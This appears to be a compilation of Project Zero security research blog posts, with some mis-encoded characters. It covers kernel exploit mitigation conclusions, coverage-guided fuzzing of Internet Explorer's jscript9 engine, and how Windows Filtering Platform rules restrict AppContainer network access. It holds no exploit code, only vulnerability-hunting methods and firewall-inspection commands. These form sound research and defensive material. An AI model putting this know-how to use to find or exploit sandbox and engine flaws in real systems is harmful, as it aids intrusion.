The problem I see with this approach is that a large portion of the things a kernel does are, in some way, critical to the correct functioning of the system and system security. MMU state management, task scheduling, memory allocation, filesystems, page cache, IPC, ... - if any one of these parts of the kernel is corrupted sufficiently badly, an attacker will probably be able to gain access to all user data on the system, or use that corruption to feed bogus inputs into one of the subsystems whose own data structures are read-only.

In my view, instead of trying to split out the most critical parts of the kernel and run them in a context with higher privileges, it might be more productive to go in the opposite direction and try to approximate something like a proper microkernel: Split out drivers that don't strictly need to be in the kernel and run them in a lower-privileged context that interacts with the core kernel through proper APIs. Of course that's easier said than done! But Linux does already have APIs for safely accessing PCI devices (VFIO) and USB devices from userspace, although userspace drivers aren't exactly its main usecase.

(One might also consider making page tables read-only not because of their importance to system integrity, but because the structure of page table entries makes them nicer to work with in exploits that are constrained in what modifications they can make to memory. I dislike this approach because I think it has no clear conclusion and it is highly invasive regarding how data structures can be laid out.)

Conclusion

This was essentially a boring locking bug in some random kernel subsystem that, if it wasn't for memory unsafety, shouldn't really have much of a relevance to system security. I wrote a fairly straightforward, unexciting (and admittedly unreliable) exploit against this bug; and probably the biggest challenge I encountered when trying to exploit it on Debian was to properly understand how the SLUB allocator works.

My intent in describing the exploit stages, and how different mitigations might affect them, is to highlight that the further a memory corruption exploit progresses, the more options an attacker gains; and so as a general rule, the earlier an exploit is stopped, the more reliable the defense is. Therefore, even if defenses that stop an exploit at an earlier point have higher overhead, they might still be more useful.

I think that the current situation of software security could be dramatically improved - in a world where a little bug in some random kernel subsystem can lead to a full system compromise, the kernel can't provide reliable security isolation. Security engineers should be able to focus on things like buggy permission checks and core memory management correctness, and not have to spend their time dealing with issues in code that ought to not have any relevance to system security.

In the short term, there are some band-aid mitigations that could be used to improve the situation - like heap partitioning or fine-grained UAF mitigation. These might come with some performance cost, and that might make them look unattractive; but I still think that they're a better place to invest development time than things like CFI, which attempts to protect against much later stages of exploitation.

In the long term, I think something has to change about the programming language - plain C is simply too error-prone. Maybe the answer is Rust; or maybe the answer is to introduce enough annotations to C (along the lines of Microsoft's Checked C project, although as far as I can see they mostly focus on things like array bounds rather than temporal issues) to allow Rust-equivalent build-time verification of locking rules, object states, refcounting, void pointer casts, and so on. Or maybe another completely different memory-safe language will become popular in the end, neither C nor Rust?

My hope is that perhaps in the mid-term future, we could have a statically verified, high-performance core of kernel code working together with instrumented, runtime-verified, non-performance-critical legacy code, such that developers can make a tradeoff between investing time into backfilling correct annotations and run-time instrumentation slowdown without compromising on security either way.

TL;DR

memory corruption is a big problem because small bugs even outside security-related code can lead to a complete system compromise; and to address that, it is important that we:

  • in the short to medium term:

    • design new memory safety mitigations:
      • ideally, that can stop attacks at an early point where attackers don't have a lot of alternate options yet
        • maybe at the memory allocator level (i.e. SLUB)
      • that can't be broken using address tag leaks (or we try to prevent tag leaks, but that's really hard)
    • continue using attack surface reduction
      • in particular seccomp
    • explicitly prevent untrusted code from gaining important attack primitives
      • like FUSE, and potentially consider fine-grained scheduler control
  • in the long term:

    • statically verify correctness of most performance-critical code
      • this will require determining how to retrofit annotations for object state and locking onto legacy C code
      • consider designing runtime verification just for gaps in static verification
‚úáGoogle Project Zero

Fuzzing Closed-Source JavaScript Engines with Coverage Feedback

By: Ryan ‚ÄĒ

Posted by Ivan Fratric, Project Zero

tl;dr I combined Fuzzilli (an open-source JavaScript engine fuzzer), with TinyInst (an open-source dynamic instrumentation library for fuzzing). I also added grammar-based mutation support to Jackalope (my black-box binary fuzzer). So far, these two approaches resulted in finding three security issues in jscript9.dll (default JavaScript engine used by Internet Explorer).

Introduction or ‚Äúwhen you can‚Äôt beat them, join them‚ÄĚ

In the past, I’ve invested a lot of time in generation-based fuzzing, which was a successful way to find vulnerabilities in various targets, especially those that take some form of language as input. For example, Domato, my grammar-based generational fuzzer, found over 40 vulnerabilities in WebKit and numerous bugs in Jscript. 

While generation-based fuzzing is still a good way to fuzz many complex targets, it was demonstrated that, for finding vulnerabilities in modern JavaScript engines, especially engines with JIT compilers, better results can be achieved with mutational, coverage-guided approaches. My colleague Samuel Groß gives a compelling case on why that is in his OffensiveCon talk. Samuel is also the author of Fuzzilli, an open-source JavaScript engine fuzzer based on mutating a custom intermediate language. Fuzzilli has found a large number of bugs in various JavaScript engines.

While there has been a lot of development on coverage-guided fuzzers over the last few years, most of the public tooling focuses on open-source targets or software running on the Linux operating system. Meanwhile, I focused on developing tooling for fuzzing of closed-source binaries on operating systems where such software is more prevalent (currently Windows and macOS). Some years back, I published WinAFL, the first performant AFL-based fuzzer for Windows. About a year and a half ago, however, I started working on a brand new toolset for black-box coverage-guided fuzzing. TinyInst and Jackalope are the two outcomes of this effort.

It comes somewhat naturally to combine the tooling I’ve been working on with techniques that have been so successful in finding JavaScript bugs, and try to use the resulting tooling to fuzz JavaScript engines for which the source code is not available. Of such engines, I know two: jscript and jscript9 (implemented in jscript.dll and jscript9.dll) on Windows, which are both used by the Internet Explorer web browser. Of these two, jscript9 is probably more interesting in the context of mutational coverage-guided fuzzing since it includes a JIT compiler and more advanced engine features.

While you might think that Internet Explorer is a thing of the past and it doesn’t make sense to spend energy looking for bugs in it, the fact remains that Internet Explorer is still heavily exploited by real-world attackers. In 2020 there were two Internet Explorer 0days exploited in the wild and three in 2021 so far. One of these vulnerabilities was in the JIT compiler of jscript9. I’ve personally vowed several times that I’m done looking into Internet Explorer, but each time, more 0days in the wild pop up and I change my mind.

Additionally, the techniques described here could be applied to any closed-source or even open-source software, not just Internet Explorer. In particular, grammar-based mutational fuzzing described two sections down can be applied to targets other than JavaScript engines by simply changing the input grammar.

Approach 1: Fuzzilli + TinyInst

Fuzzilli, as said above, is a state-of-the-art JavaScript engine fuzzer and TinyInst is a dynamic instrumentation library. Although TinyInst is general-purpose and could be used in other applications, it comes with various features useful for fuzzing, such as out-of-the-box support for persistent fuzzing, various types of coverage instrumentations etc. TinyInst is meant to be simple to integrate with other software, in particular fuzzers, and has already been integrated with some.

So, integrating with Fuzzilli was meant to be simple. However, there were still various challenges to overcome for different reasons:

Challenge 1: Getting Fuzzilli to build on Windows where our targets are.

Edit 2021-09-20: The version of Swift for Windows used in this project was from January 2021, when I first started working on it. Since version 5.4, Swift Package Manager is supported on Windows, so building Swift code should be much easier now. Additionally, static linking is supported for C/C++ code.

Fuzzilli was written in Swift and the support for Swift on Windows is currently not great. While Swift on Windows builds exist (I’m linking to the builds by Saleem Abdulrasool instead of the official ones because the latter didn’t work for me), not all features that you would find on Linux and macOS are there. For example, one does not simply run swift build on Windows, as the build system is one of the features that didn’t get ported (yet). Fortunately, CMake and Ninja  support Swift, so the solution to this problem is to switch to the CMake build system. There are helpful examples on how to do this, once again from Saleem Abdulrasool.

Another feature that didn‚Äôt make it to Swift for Windows is statically linking libraries. This means that all libraries (such as those written in C and C++ that the user wants to include in their Swift project) need to be dynamically linked. This goes for libraries already included in the Fuzzilli project, but also for TinyInst. Since TinyInst also uses the CMake build system, my first attempt at integrating TinyInst was to include it via the Fuzzilli CMake project, and simply have it built as a shared library. However, the same tooling that was successful in building Fuzzilli would fail to build TinyInst (probably due to various platform libraries TinyInst uses). That‚Äôs why, in the end, TinyInst was being built separately into a .dll and this .dll loaded ‚Äúmanually‚ÄĚ into Fuzzilli via the LoadLibrary¬†API. This turned out not to be so bad - Swift build tooling for Windows was quite slow, and so it was much faster to only build TinyInst when needed, rather than build the entire Fuzzilli project (even when the changes made were minor).

The Linux/macOS parts of Fuzzilli, of course, also needed to be rewritten. Fortunately, it turned out that the parts that needed to be rewritten were the parts written in C, and the parts written in Swift worked as-is (other than a couple of exceptions, mostly related to networking). As someone with no previous experience with Swift, this was quite a relief. The main parts that needed to be rewritten were the networking library (libsocket), the library used to run and monitor the child process (libreprl) and the library for collecting coverage (libcoverage). The latter two were changed to use TinyInst. Since these are separate libraries in Fuzzilli, but TinyInst handles both of these tasks, some plumbing through Swift code was needed to make sure both of these libraries talk to the same TinyInst instance for a given target.

Challenge 2: Threading woes

Another feature that made the integration less straightforward than hoped for was the use of threading in Swift. TinyInst is built on a custom debugger and, on Windows, it uses the Windows debugging API. One specific feature of the Windows debugging API, for example WaitForDebugEvent, is that it does not take a debugee pid or a process handle as an argument. So then, the question is, if you have multiple debugees, to which of them does the API call refer? The answer to that is, when a debugger on Windows attaches to a debugee (or starts a debugee process), the thread  that started/attached it is the debugger. Any subsequent calls for that particular debugee need to be issued on that same thread.

In contrast, the preferred Swift coding style (that Fuzzilli also uses) is to take advantage of threading primitives such as DispatchQueue. When tasks get posted on a DispatchQueue, they can run in parallel on ‚Äúbackground‚ÄĚ threads. However, with the background threads, there is no guarantee that a certain task is always going to run on the same thread. So it would happen that calls to the same TinyInst instance happened from different threads, thus breaking the Windows debugging model. This is why, for the purposes of this project, TinyInst was modified to create its own thread (one for each target process) and ensure that any debugger calls for a particular child process always happen on that thread.

Various minor changes

Some examples of features Fuzzilli requires that needed to be added to TinyInst are stdin/stdout¬†redirection and a channel for reading out the ‚Äústatus‚ÄĚ of JavaScript execution (specifically, to be able to tell if JavaScript code was throwing an exception or executing successfully). Some of these features were already integrated into the ‚Äúmainline‚ÄĚ TinyInst or will be integrated in the future.

After all of that was completed though, the Fuzzilli/Tinyinst hybrid was running in a stable manner:

Note that coverage percentage reported by Fuzzilli is incorrect. Because TinyInst is a dynamic instrumentation library, it cannot know the number of basic blocks/edges in advance.

Primarily because of the current Swift on Windows issues, this closed-source mode of Fuzzilli is not something we want to officially support. However, the sources and the build we used can be downloaded here.

Approach 2: Grammar-based mutation fuzzing with Jackalope

Jackalope is a coverage-guided fuzzer I developed for fuzzing black-box binaries on Windows and, recently, macOS. Jackalope initially included mutators suitable for fuzzing of binary formats. However, a key feature of Jackalope is modularity: it is meant to be easy to plug in or replace individual components, including, but not limited to, sample mutators.

After observing how Fuzzilli works more closely during Approach 1, as well as observing samples it generated and the bugs it found, the idea was to extend Jackalope to allow mutational JavaScript fuzzing, but also in the future, mutational fuzzing of other targets whose samples can be described by a context-free grammar.

Jackalope uses a grammar syntax similar to that of Domato, but somewhat simplified (with some features not supported at this time). This grammar format is easy to write and easy to modify (but also easy to parse). The grammar syntax, as well as the list of builtin symbols, can be found on this page and the JavaScript grammar used in this project can be found here.

One addition to the Domato grammar syntax that allows for more natural mutations, but also sample minimization, are the <repeat_*> grammar nodes. A <repeat_x> symbol tells the grammar engine that it can be represented as zero or more <x> nodes. For example, in our JavaScript grammar, we have

<statementlist> = <repeat_statement>

telling the grammar engine that <statementlist> can be constructed by concatenating zero or more <statement>s. In our JavaScript grammar, a <statement> expands to an actual JavaScript statement. This helps the mutation engine in the following way: it now knows it can mutate a sample by inserting another <statement> node anywhere in the <statementlist> node. It can also remove <statement> nodes from the <statementlist> node. Both of these operations will keep the sample valid (in the grammar sense).

It’s not mandatory to have <repeat_*> nodes in the grammar, as the mutation engine knows how to mutate other nodes as well (see the list of mutations below). However, including them where it makes sense might help make mutations in a more natural way, as is the case of the JavaScript grammar.

Internally, grammar-based mutation works by keeping a tree representation of the sample instead of representing the sample just as an array of bytes (Jackalope must in fact represent a grammar sample as a sequence of bytes at some points in time, e.g when storing it to disk, but does so by serializing the tree and deserializing when needed). Mutations work by modifying a part of the tree in a manner that ensures the resulting tree is still valid within the context of the input grammar. Minimization works by removing those nodes that are determined to be unnecessary.

Jackalope’s mutation engine can currently perform the following operations on the tree:

  • Generate a new tree from scratch. This is not really a mutation and is mainly used to bootstrap the fuzzers when no input samples are provided. In fact, grammar fuzzing mode in Jackalope must either start with an empty corpus or a corpus generated by a previous session. This is because there is currently no way to parse a text file (e.g. a JavaScript source file) into its grammar tree representation (in general, there is no guaranteed unique way to parse a sample with a context-free grammar).
  • Select a random node in the sample's tree representation. Generate just this node anew while keeping the rest of the tree unchanged.
  • Splice: Select a random node from the current sample and a node with the same symbol from another sample. Replace the node in the current sample with a node from the other sample.
  • Repeat node mutation: One or more new children get added to a <repeat_*>¬†node, or some of the existing children get replaced.
  • Repeat splice: Selects a <repeat_*>¬†node from the current sample and a similar <repeat_*>¬†node from another sample. Mixes children from the other node into the current node.

JavaScript grammar was initially constructed by following  the ECMAScript 2022 specification. However, as always when constructing fuzzing grammars from specifications or in a (semi)automated way, this grammar was only a starting point. More manual work was needed to make the grammar output valid and generate interesting samples more frequently.

Jackalope now supports grammar fuzzing out-of-the box, and, in order to use it, you just need to add -grammar <path_to_grammar_file> to Jackalope’s command lines. In addition to running against closed-source targets on Windows and macOS, Jackalope can now run against open-source targets on Linux using Sanitizer Coverage based instrumentation. This is to allow experimentation with grammar-based mutation fuzzing on open-source software.

The following image shows Jackalope running against jscript9.

Jackalope running against jscript9.

Results

I ran Fuzzilli for several weeks on 100 cores. This resulted in finding two vulnerabilities, CVE-2021-26419 and CVE-2021-31959. Note that the bugs that were analyzed and determined not to have security impact are not counted here. Both of the vulnerabilities found were in the bytecode generator, a part of the JavaScript engine that is typically not very well tested by generation-based fuzzing approaches. Both of these bugs were found relatively early in the fuzzing process and would be findable even by fuzzing on a single machine.

The second of the two bugs was particularly interesting because it initially manifested only as a NULL pointer dereference that happened occasionally, and it took quite a bit of effort (including tracing JavaScript interpreter execution in cases where it crashed and in cases where it didn’t to see where the execution flow diverges) to reach the root cause. Time travel debugging was also useful here - it would be quite difficult if not impossible to analyze the sample without it. The reader is referred to the vulnerability report for further details about the issue.

Jackalope was run on a similar setup: for several weeks on 100 cores. Interestingly, at least against jscript9, Jackalope with grammar-based mutations behaved quite similarly to Fuzzilli: it was hitting a similar level of coverage and finding similar bugs. It also found CVE-2021-26419 quickly into the fuzzing process. Of course, it’s easy to re-discover bugs once they have already been found with another tool, but neither the grammar engine nor the JavaScript grammar contain anything specifically meant for finding these bugs.

About a week and a half into fuzzing with Jackalope, it triggered a bug I hadn't seen before, CVE-2021-34480. This time, the bug was in the JIT compiler, which is another component not exercised very well with generation-based approaches. I was quite happy with this find, because it validated the feasibility of a grammar-based approach for finding JIT bugs.

Limitations and improvement ideas

While successful coverage-guided fuzzing of closed-source JavaScript engines is certainly possible as demonstrated above, it does have its limitations. The biggest one is inability to compile the target with additional debug checks. Most of the modern open-source JavaScript engines include additional checks that can be compiled in if needed, and enable catching certain types of bugs more easily, without requiring that the bug crashes the target process. If jscript9 source code included such checks, they are lost in the release build we fuzzed.

Related to this, we also can’t compile the target with something like Address Sanitizer. The usual workaround for this on Windows would be to enable Page Heap for the target. However, it does not work well here. The reason is, jscript9 uses a custom allocator for JavaScript objects. As Page Heap works by replacing the default malloc(), it simply does not apply here.

A way to get around this would be to use instrumentation (TinyInst is already a general-purpose instrumentation library so it could be used for this in addition to code coverage) to instrument the allocator and either insert additional checks or replace it completely. However, doing this was out-of-scope for this project.

Conclusion

Coverage-guided fuzzing of closed-source targets, even complex ones such as JavaScript engines is certainly possible, and there are plenty of tools and approaches available to accomplish this.

In the context of this project, Jackalope fuzzer was extended to allow grammar-based mutation fuzzing. These extensions have potential to be useful beyond just JavaScript fuzzing and can be adapted to other targets by simply using a different input grammar. It would be interesting to see which other targets the broader community could think of that would benefit from a mutation-based approach.

Finally, despite being targeted by security researchers for a long time now, Internet Explorer still has many exploitable bugs that can be found even without large resources. After the development on this project was complete, Microsoft announced that they will be removing Internet Explorer as a separate browser. This is a good first step, but with Internet Explorer (or Internet Explorer engine) integrated into various other products (most notably, Microsoft Office, as also exploited by in-the-wild attackers), I wonder how long it will truly take before attackers stop abusing it.

‚úáGoogle Project Zero

Understanding Network Access in Windows AppContainers

By: Ryan ‚ÄĒ

Posted by James Forshaw, Project Zero

Recently I've been delving into the inner workings of the Windows Firewall. This is interesting to me as it's used to enforce various restrictions such as whether AppContainer sandboxed applications can access the network. Being able to bypass network restrictions in AppContainer sandboxes is interesting as it expands the attack surface available to the application, such as being able to access services on localhost, as well as granting access to intranet resources in an Enterprise.

I recently discovered a configuration issue with the Windows Firewall which allowed the restrictions to be bypassed and allowed an AppContainer process to access the network. Unfortunately Microsoft decided it didn't meet the bar for a security bulletin so it's marked as WontFix.

As the mechanism that the Windows Firewall uses to restrict access to the network from an AppContainer isn't officially documented as far as I know, I'll provide the details on how the restrictions are implemented. This will provide the background to understanding why my configuration issue allowed for network access.

I'll also take the opportunity to give an overview of how the Windows Firewall functions and how you can use some of my tooling to inspect the current firewall configuration. This will provide security researchers with the information they need to better understand the firewall and assess its configuration to find other security issues similar to the one I reported. At the same time I'll note some interesting quirks in the implementation which you might find useful.

Windows Firewall Architecture Primer

Before we can understand how network access is controlled in an AppContainer we need to understand how the built-in Windows firewall functions. Prior to XP SP2 Windows didn't have a built-in firewall, and you would typically install a third-party firewall such as ZoneAlarm. These firewalls were implemented by hooking into Network Driver Interface Specification (NDIS) drivers or implementing user-mode Winsock Service Providers but this was complex and error prone.

While XP SP2 introduced the built-in firewall, the basis for the one used in modern versions of Windows was introduced in Vista as the Windows Filtering Platform (WFP). However, as a user you wouldn't typically interact directly with WFP. Instead you'd use a firewall product which exposes a user interface, and then configures WFP to do the actual firewalling. On a default installation of Windows this would be the Windows Defender Firewall. If you installed a third-party firewall this would replace the Defender component but the actual firewall would still be implemented through configuring WFP.

Architectural diagram of the built-in Windows Firewall. Showing a separation between user components (MPSSVC, BFE) and the kernel components (AFD, TCP/IP, NETIO and Callout Drivers)

The diagram gives an overview of how various components in the OS are connected together to implement the firewall. A user would interact with the Windows Defender firewall using the GUI, or a command line interface such as PowerShell's NetSecurity module. This interface communicates with the Windows Defender Firewall Service (MPSSVC) over RPC to query and modify the firewall rules.

MPSSVC converts its ruleset to the lower-level WFP firewall filters and sends them over RPC to the Base Filtering Engine (BFE) service. These filters are then uploaded to the TCP/IP driver (TCPIP.SYS) in the kernel which is where the firewall processing is handled. The device objects (such as \Device\WFP) which the TCP/IP driver exposes are secured so that only the BFE service can access them. This means all access to the kernel firewall needs to be mediated through the service.

When an application, such as a Web Browser, creates a new network socket the AFD driver responsible for managing sockets will communicate with the TCP/IP driver to configure the socket for IP. At this point the TCP/IP driver will capture the security context of the creating process and store that for later use by the firewall. When an operation is performed on the socket, such as making or accepting a new connection, the firewall filters will be evaluated.

The evaluation is handled primarily by the NETIO driver as well as registered callout drivers. These callout drivers allow for more complex firewall rules to be implemented as well as inspecting and modifying network traffic. The drivers can also forward checks to user-mode services. As an example, the ability to forward checks to user mode allows the Windows Defender Firewall to display a UI when an unknown application listens on a wildcard address, as shown below.

Dialog displayed by the Windows Firewall service when an unknown application tries to listen for incoming connections.

The end result of the evaluation is whether the operation is permitted or blocked. The behavior of a block depends on the operation. If an outbound connection is blocked the caller is notified. If an inbound connection is blocked the firewall will drop the packets and provide no notification to the peer, such as a TCP Reset or ICMP response. This default drop behavior can be changed through a system wide configuration change. Let's dig into more detail on how the rules are configured for evaluation.

Layers, Sublayers and Filters

The firewall rules are configured using three types of object: layers, sublayers and filters as shown in the following diagram.

Diagram showing the relationship between layers, sublayers and filters. Each layer can have one or more sublayers which in turn has one or more associated filters.

The firewall layer is used to categorize the network operation to be evaluated. For example there are separate layers for inbound and outbound packets. This is typically further differentiated by IP version, so there are separate IPv4 and IPv6 layers for inbound and outbound packets. While the firewall is primarily focussed on IP traffic there does exist limited MAC and Virtual Switch layers to perform specialist firewalling operations. You can find the list of pre-defined layers on MSDN here. As the WFP needs to know what layer handles which operation there's no way for additional layers to be added to the system by a third-party application.

When a packet is evaluated by a layer the WFP performs Filter Arbitration. This is a set of rules which determine the order of evaluation of the filters. First WFP enumerates all registered filters which are associated with the layer's unique GUID. Next, WFP groups the filters by their sublayer's GUID and orders the filter groupings by a weight value which was specified when the sublayer was registered. Finally, WFP evaluates each filter according to the order based on a weight value specified when the filter was registered.

For every filter, WFP checks if the list of conditions match the packet and its associated meta-data. If the conditions match then the filter performs a specified action, which can be one of the following:

  • Permit
  • Block
  • Callout Terminating
  • Callout Unknown
  • Callout Inspection

If the action is Permit or Block then the filter evaluation for the current sublayer is terminated with that action as the result. If the action is a callout then WFP will invoke the filter's registered callout driver's classify function to perform additional checks. The classify function can evaluate the packet and its meta-data and specify a final result of Permit, Block or additionally Continue which indicates the filter should be ignored. In general if the action is Callout Terminating then it should only set Permit and Block, and if it's Callout Inspection then it should only set Continue. The Callout Unknown action is for callouts which might terminate or might not depending on the result of the classification.

Once a terminating filter has been evaluated WFP stops processing that sublayer. However, WFP will continue to process the remaining sublayers in the same way regardless of the final result. In general if any sublayer returns a Block result then the packet will be blocked, otherwise it'll be permitted. This means that if a higher priority sublayer's result is Permit, it can still be blocked by a lower-priority sublayer.

A filter can be configured with the FWPM_FILTER_FLAG_CLEAR_ACTION_RIGHT¬†flag which indicates that the result should be considered ‚Äúhard‚ÄĚ allowing a higher priority filter to permit a packet which can't be overridden by a lower-priority blocking filter. The rules for the final result are even more complex than I make out including soft blocks and vetos, refer to the page in MSDN¬†for more information.

 

To simplify the classification of network traffic, WFP provides a set of stateful layers which correspond to major network events such as TCP connection and port binding. The stateful filtering is referred to as Application Layer Enforcement (ALE). For example the FWPM_LAYER_ALE_AUTH_CONNECT_V4 layer will be evaluated when a TCP connection using IPv4 is being made.

For any given connection it will only be evaluated once, not for every packet associated with the TCP connection handshake. In general these ALE layers are the ones we'll focus on when inspecting the firewall configuration, as they're the most commonly used. The three main ALE layers you're going to need to inspect are the following:

Name

Description

FWPM_LAYER_ALE_AUTH_CONNECT_V4/6

Processed when TCP connect() called.

FWPM_LAYER_ALE_AUTH_LISTEN_V4/6

Processed when TCP listen() called.

FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4/6

Processed when a packet/connection is received.

What layers are used and in what order they are evaluated depend on the specific operation being performed. You can find the list of the layers for TCP packets here and UDP packets here. Now, let's dig into how filter conditions are defined and what information they can check.

Filter Conditions

Each filter contains an optional list of conditions which are used to match a packet. If no list is specified then the filter will always match any incoming packet and perform its defined action. If more than one condition is specified then the filter is only matched if all of the conditions match. If you have multiple conditions of the same type they're OR'ed together, which allows a single filter to match on multiple values.

Each condition contains three values:

  • The layer field to check.
  • The value to compare against.
  • The match type, for example the packet value and the condition value are equal.

Each layer has a list of fields that will be populated whenever a filter's conditions are checked. The field might directly reflect a value from the packet, such as the destination IP address or the interface the packet is traversing. Or it could be a metadata value, such as the user identity of the process which created the socket. Some common fields are as follows:

Field Type

Description

FWPM_CONDITION_IP_REMOTE_ADDRESS

The remote IP address.

FWPM_CONDITION_IP_LOCAL_ADDRESS

The local IP address.

FWPM_CONDITION_IP_PROTOCOL

The IP protocol type, e.g. TCP or UDP

FWPM_CONDITION_IP_REMOTE_PORT

The remote protocol port.

FWPM_CONDITION_IP_LOCAL_PORT

The local protocol port.

FWPM_CONDITION_ALE_USER_ID

The user's identity.

FWPM_CONDITION_ALE_REMOTE_USER_ID

The remote user's identity.

FWPM_CONDITION_ALE_APP_ID

The path to the socket's executable.

FWPM_CONDITION_ALE_PACKAGE_ID

The user's AppContainer package SID.

FWPM_CONDITION_FLAGS

A set of additional flags.

FWPM_CONDITION_ORIGINAL_PROFILE_ID

The source network interface profile.

FWPM_CONDITION_CURRENT_PROFILE_ID

The current network interface profile.

The value to compare against the field can take different values depending on the field being checked. For example the field FWPM_CONDITION_IP_REMOTE_ADDRESS can be compared to IPv4 or IPv6 addresses depending on the layer it's used in. The value can also be a range, allowing a filter to match on an IP address within a bounded set of addresses.

The FWPM_CONDITION_ALE_USER_ID and FWPM_CONDITION_ALE_PACKAGE_ID conditions are based on the access token captured when creating the TCP or UDP socket. The FWPM_CONDITION_ALE_USER_ID stores a security descriptor which is used with an access check with the creator's token. If the token is granted access then the condition is considered to match. For FWPM_CONDITION_ALE_PACKAGE_ID the condition checks the package SID of the AppContainer token. If the token is not an AppContainer then the filtering engine sets the package SID to the NULL SID (S-1-0-0).

The FWPM_CONDITION_ALE_REMOTE_USER_ID is similar to the FWPM_CONDITION_ALE_USER_ID condition but compares against the remote authenticated user. In most cases sockets are not authenticated, however if IPsec is in use that can result in a remote user token being available to compare. It's also used in some higher-level layers such as RPC filters.

The match type can be one of the following:

  • FWP_MATCH_EQUAL
  • FWP_MATCH_EQUAL_CASE_INSENSITIVE
  • FWP_MATCH_FLAGS_ALL_SET
  • FWP_MATCH_FLAGS_ANY_SET
  • FWP_MATCH_FLAGS_NONE_SET
  • FWP_MATCH_GREATER
  • FWP_MATCH_GREATER_OR_EQUAL
  • FWP_MATCH_LESS
  • FWP_MATCH_LESS_OR_EQUAL
  • FWP_MATCH_NOT_EQUAL
  • FWP_MATCH_NOT_PREFIX
  • FWP_MATCH_PREFIX
  • FWP_MATCH_RANGE

The match types should hopefully be self explanatory based on their names. How the match is interpreted depends on the field's type and the value being used to check against.

Inspecting the Firewall Configuration

We now have an idea of the basics of how WFP works to filter network traffic. Let's look at how to inspect the current configuration. We can't use any of the normal firewall commands or UIs such as the PowerShell NetSecurity module as I already mentioned these represent the Windows Defender view of the firewall.

Instead we need to use the RPC APIs BFE exposes to access the configuration, for example you can access a filter using the FwpmFilterGetByKey0 API. Note that the BFE maintains security descriptors to restrict access to WFP objects. By default nothing can be accessed by non-administrators, therefore you'd need to call the RPC APIs while running as an administrator.

You could implement your own tooling to call all the different APIs, but it'd be much easier if someone had already done it for us. For built-in tools the only one I know of is using netsh with the wfp namespace. For example to dump all the currently configured filters you can use the following command as an administrator:

PS> netsh wfp show filters file = -

This will print all filters in an XML format to the console. Be prepared to wait a while for the output to complete. You can also dump straight to a file. Of course you now need to interpret the XML results. It is possible to also specify certain parameters, such as local and remote addresses to reduce the output to only matching filters.

Processing an XML file doesn't sound too appealing. To make the firewall configuration easier to inspect I've added many of the BFE APIs to my NtObjectManager PowerShell module from version 1.1.32 onwards. The module exposes various commands which will return objects representing the current WFP configuration which you can easily use to inspect and group the results however you see fit.

Layer Configuration

Even though the layers are predefined in the WFP implementation it's still useful to be able to query the details about them. For this you can use the Get-FwLayer command.

PS> Get-FwLayer

KeyName                           Name                                    

-------                           ----                                    

FWPM_LAYER_OUTBOUND_IPPACKET_V6   Outbound IP Packet v6 Layer            

FWPM_LAYER_IPFORWARD_V4_DISCARD   IP Forward v4 Discard Layer            

FWPM_LAYER_ALE_AUTH_LISTEN_V4     ALE Listen v4 Layer

...

The output shows the SDK name for the layer, if it has one, and the name of the layer that the BFE service has configured. The layer can be queried by its SDK name, its GUID or a numeric ID, which we will come back to later. As we mostly only care about the ALE layers then there's a special AleLayer parameter to query a specific layer without needing to remember the full name or ID.

PS> (Get-FwLayer -AleLayer ConnectV4).Fields

KeyName                          Type      DataType              

-------                          ----      --------              

FWPM_CONDITION_ALE_APP_ID        RawData   ByteBlob              

FWPM_CONDITION_ALE_USER_ID       RawData   TokenAccessInformation

FWPM_CONDITION_IP_LOCAL_ADDRESS  IPAddress UInt32                

...

Each layer exposes the list of fields which represent the conditions which can be checked in that layer, you can access the list through the Fields property. The output shown above contains a few of the condition types we saw earlier in the table of conditions. The output also shows the type of the condition and the data type you should provide when filtering on that condition.

PS> Get-FwSubLayer | Sort-Object Weight | Select KeyName, Weight

KeyName                                   Weight

-------                                   ------

FWPM_SUBLAYER_INSPECTION                       0

FWPM_SUBLAYER_TEREDO                           1

MICROSOFT_DEFENDER_SUBLAYER_FIREWALL           2

MICROSOFT_DEFENDER_SUBLAYER_WSH                3

MICROSOFT_DEFENDER_SUBLAYER_QUARANTINE         4            

...

You can also inspect the sublayers in the same way, using the Get-FwSubLayer command as shown above. The most useful information from the sublayer is the weight. As mentioned earlier this is used to determine the ordering of the associated filters. However, as we'll see you rarely need to query the weight yourself.

Filter Configuration

Enforcing the firewall rules is up to the filters. You can enumerate all filters using the Get-FwFilter command.

PS> Get-FwFilter

FilterId ActionType Name

-------- ---------- ----

68071    Block     Boot Time Filter

71199    Permit    @FirewallAPI.dll,-80201

71350    Block     Block inbound traffic to dmcertinst.exe

...

The default output shows the ID of a filter, the action type and the user defined name. The filter objects returned also contain the layer and sublayer identifiers as well as the list of matching conditions for the filter. As inspecting the filter is going to be the most common operation the module provides the Format-FwFilter command to format a filter object in a more readable format.

PS> Get-FwFilter -Id 71350 | Format-FwFilter

Name       : Block inbound traffic to dmcertinst.exe

Action Type: Block

Key        : c391b53a-1b98-491c-9973-d86e23ea8a84

Id         : 71350

Description:

Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : Indexed

Weight     : 549755813888

Conditions :

FieldKeyName              MatchType Value

------------              --------- -----

FWPM_CONDITION_ALE_APP_ID Equal    

\device\harddiskvolume3\windows\system32\dmcertinst.exe

The formatted output contains the layer and sublayer information, the assigned weight of the filter and the list of conditions. The layer is FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4 which handles new incoming connections. The sublayer is MICROSOFT_DEFENDER_SUBLAYER_WSH which is used to group Windows Service Hardening rules which apply regardless of the normal firewall configuration.

In this example the filter only matches on the socket creator process executable's path. The end result if the filter matches the current state is for the IPv4 TCP network connection to be blocked at the MICROSOFT_DEFENDER_SUBLAYER_WSH sublayer. As already mentioned it now won't matter if a lower priority layer would permit the connection if the block is enforced.

How can we determine the ordering of sublayers and filters? You could manually extract the weights for each sublayer and filter and try and order them, and hopefully the ordering you come up with matches what WFP uses. A much simpler approach is to specify a flag when enumerating filters for a particular layer to request the BFE APIs sort the filters using the canonical ordering.

PS> Get-FwFilter -AleLayer ConnectV4 -Sorted

FilterId ActionType     Name

-------- ----------     ----

65888    Permit         Interface Un-quarantine filter

66469    Block          AppContainerLoopback

66467    Permit         AppContainerLoopback

66473    Block          AppContainerLoopback

...

